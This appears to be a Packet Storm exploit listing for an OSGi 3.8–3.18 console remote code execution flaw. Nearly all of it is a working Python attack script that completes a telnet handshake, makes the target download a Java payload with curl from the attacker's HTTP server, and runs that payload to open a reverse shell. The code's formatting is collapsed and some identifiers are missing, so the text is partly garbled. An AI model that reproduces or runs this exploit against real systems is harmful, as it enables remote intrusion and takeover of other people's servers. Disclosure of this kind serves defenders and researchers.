

OSGi 3.18 Remote Code Execution

OSGi versions 3.8 through 3.18 suffer from a remote code execution vulnerability.

Packet Storm
#!/usr/bin/python# Exploit Title: [OSGi v3.8-3.18 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           []# Vendor Homepage: []# Software Link: []# Version: [3.8 - 3.18]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python --help## Example:# python --rhost= --rport=1337 --lhost= \#                                                      --lport=4444"""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.8-3.18 and earlier."""import argparseimport socketimport sysimport threadingfrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServer# Stage 1 of the handshake messageHANDSHAKE_STAGE_1 = \    b"\xff\xfd\x01\xff\xfd" \    b"\x03\xff\xfb\x1f\xff" \    b"\xfa\x1f\x00\x74\x00" \    b"\x37\xff\xf0\xff\xfb" \    b"\x18"# Stage 2 of the handshake messageHANDSHAKE_STAGE_2 = \    b"\xff\xfa\x18\x00\x58" \    b"\x54\x45\x52\x4d\x2d" \    b"\x32\x35\x36\x43\x4f" \    b"\x4c\x4f\x52\xff\xf0"# The buffer of this size is enough to handle the telnet handshakeBUFFER_SIZE = 2 * 1024class HandlerClass(BaseHTTPRequestHandler):    """    This class overrides the BaseHTTPRequestHandler. It provides a specific    functionality used to deliver a payload to the target host.    """    _lhost: str    _lport: int    def __init__(self, lhost, lport, *args, **kwargs):        self._lhost = lhost        self._lport = lport        super().__init__(*args, **kwargs)    def _set_response(self):        self.send_response(200)        self.send_header("Content-type", "text/html")        self.end_headers()    def do_GET(self):  # pylint: disable=C0103        """        This method is responsible for the playload delivery.        """        print("Delivering the payload...")        self._set_response()        self.wfile.write(generate_revshell_payload(            self._lhost, self._lport).encode('utf-8'))        raise KeyboardInterrupt    def log_message(self, format, *args):  # pylint: disable=W0622        """        This method redefines a built-in method to suppress        BaseHTTPRequestHandler log messages.        """        returndef generate_revshell_payload(lhost, lport):    """    This function generates the Revershe Shell payload that will    be executed on the target host.    """    payload = \        "import;import;" \        "import;import;" \        "class RevShell {public static void main(String[] args) " \        "throws Exception { String host=\"%s\";int port=%d;" \        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \        ">0)so.write(;while(pe.available()>0)so.write(;" \        "while(si.available()>0)po.write(;so.flush();po.flush();" \        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \        "p.destroy();s.close();}}\n" % (            lhost, lport)    return payloaddef run_payload_delivery(lhost, lport):    """    This function is responsible for payload delivery.    """    print("Setting up the HTTP server for payload delivery...")    handler_class = partial(HandlerClass, lhost, lport)    server_address = ('', 80)    httpd = HTTPServer(server_address, handler_class)    try:        print("[+] HTTP server is running.")        httpd.serve_forever()    except KeyboardInterrupt:        print("[+] Payload delivered.")    except Exception as err:  # pylint: disable=broad-except        print("[-] Failed payload delivery!")        print(err)    finally:        httpd.server_close()def generate_stage_1(lhost):    """    This function generates the stage 1 of the payload.    """    stage_1 = b"fork \"curl http://%s -o ./\"\n" % (        lhost.encode()    )    return stage_1def generate_stage_2():    """    This function generates the stage 2 of the payload.    """    stage_2 = b"fork \"java ./\"\n"    return stage_2def establish_connection(rhost, rport):    """    This function creates a socket and establishes the connection    to the target host.    """    print("[*] Connecting to OSGi Console...")    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((rhost, rport))    print("[+] Connected.")    return sockdef process_handshake(sock):    """    This function process the handshake with the target host.    """    print("[*] Processing the handshake...")    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_1)    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def deliver_payload(sock, lhost):    """    This function executes the first stage of the exploitation.    It triggers the payload delivery mechanism to the target host.    """    stage_1 = generate_stage_1(lhost)    print("[*] Triggering the payload delivery...")    sock.send(stage_1)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def execute_payload(sock):    """    This function executes the second stage of the exploitation.    It sends payload which is responsible for code execution.    """    stage_2 = generate_stage_2()    print("[*] Executing the payload...")    sock.send(stage_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)    print("[+] Payload executed.")def exploit(args, thread):    """    This function sends the multistaged payload to the tareget host.    """    try:        sock = establish_connection(args.rhost, args.rport)        process_handshake(sock)        deliver_payload(sock, args.lhost)        # Join the thread running the HTTP server        # and wait for payload delivery        thread.join()        execute_payload(sock)        sock.close()        print("[+] Done.")    except socket.error as err:        print("[-] Could not connect!")        print(err)        sys.exit()def parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.8-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in versions between 3.8 and 3.18.",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    return parser.parse_args()def main(args):    """    Main fuction.    """    thread = threading.Thread(        target=run_payload_delivery, args=(args.lhost, args.lport))    thread.start()    exploit(args, thread)if __name__ == "__main__":    main(parse())

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